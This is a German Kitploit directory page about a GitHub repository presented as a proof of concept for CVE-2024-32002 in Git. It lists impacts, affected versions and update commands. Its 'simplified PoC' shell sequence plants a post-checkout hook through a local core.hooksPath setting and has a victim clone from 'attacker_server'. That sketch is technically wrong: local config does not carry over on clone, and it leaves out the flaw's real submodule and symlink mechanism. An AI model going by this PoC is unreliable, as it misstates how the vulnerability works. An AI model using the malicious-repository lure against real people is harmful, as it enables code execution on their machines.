Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32002-PoC_Chinese — keine | Kitploit
Tools/GitHubGitHub/basyacatx/cve-2024-32002-poc_chinese
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubbasyacatx/cve-2024-32002-poc_chinese

CVE-2024-32002-PoC_Chinese

keine

Repository anzeigen
21vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-32002 – Übersicht über die Schwachstelle (⚠️Achtung!: Klonen Sie dieses Repository NICHT!!!⚠️)

Beschreibung

CVE-2024-32002 ist eine schwerwiegende Sicherheitslücke, die in der Git-Software entdeckt wurde. Diese Schwachstelle ermöglicht es einem entfernten Angreifer, über ein speziell präpariertes Git-Repository beliebigen Code auf betroffenen Systemen auszuführen. Die Schwachstelle besteht in der Verarbeitung bestimmter Repository-Operationen durch Git, bei der aufgrund unzureichender Überprüfung der Eingabedaten ein Risiko für Remote-Code-Ausführung (RCE) besteht.

Auswirkungen

Eine erfolgreiche Ausnutzung dieser Schwachstelle kann Folgendes zur Folge haben:

  • Remote-Code-Ausführung (RCE): Der Angreifer kann beliebigen Code auf dem betroffenen System ausführen.
  • Systemkontrolle: Der Angreifer kann die vollständige Kontrolle über das betroffene System erlangen.
  • Datenlecks und -manipulation: Unbefugter Zugriff auf und Änderung von sensiblen Daten.
  • Weitere Angriffe: Initiierung weiterer Angriffe innerhalb des Netzwerks des Opfers.

Betroffene Versionen

Die folgenden Versionen der Git-Software sind von CVE-2024-32002 betroffen: Versions Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4

Details zur Schwachstelle

Tool herunterladen

Details zu CVE-2024-32002 Die Schwachstelle besteht in der Verarbeitung bestimmter Repository-Operationen durch Git. Wenn ein Benutzer ein bösartiges Git-Repository klont oder damit interagiert, kann der Angreifer durch ein speziell präpariertes Repository oder eine spezielle Commit-Historie bösartigen Code einschleusen. Aufgrund mangelhafter Eingabevalidierung kann dieser bösartige Code bei der Ausführung von Repository-Operationen die Sicherheitsprüfungen umgehen und zur Ausführung beliebigen Codes führen.

Angriffsvektoren

  1. Bösartiges Repository: Der Angreifer erstellt ein bösartiges Git-Repository mit einer speziell präparierten Commit-Historie oder Dateien.
  2. Social Engineering: Der Angreifer verleitet das Opfer dazu, das bösartige Repository zu klonen oder damit zu interagieren.
  3. Code-Ausführung: Wenn das Opfer bestimmte Git-Operationen ausführt (z. B. git clone, git pull), wird der bösartige Code ausgelöst und ausgeführt.

Abhilfemaßnahmen

Aktualisierung

Benutzern wird dringend empfohlen, auf die neueste Version der Git-Software zu aktualisieren, die den Patch für diese Schwachstelle enthält. Die reparierten Versionen lauten:

  • Git 2.45.1 und höher

Der Aktualisierungsbefehl lautet wie folgt:

root@kitploit:~
# Für macOS
brew upgrade git

# Für Ubuntu/Debian
sudo apt-get update
sudo apt-get install git

# Für CentOS/RHEL
sudo yum update git

Ausnutzungsmethode

Ein Proof-of-Concept (PoC) für CVE-2024-32002 wurde veröffentlicht. Nachfolgend ein vereinfachtes PoC-Beispiel:

root@kitploit:~
# Angreifer erstellt bösartiges Repository
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"

# Auslösen der Schwachstelle durch injizierte Commit-Historie mit bösartigem Code
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"

# Opfer klont das bösartige Repository und löst die Schwachstelle aus
git clone attacker_server/malicious-repo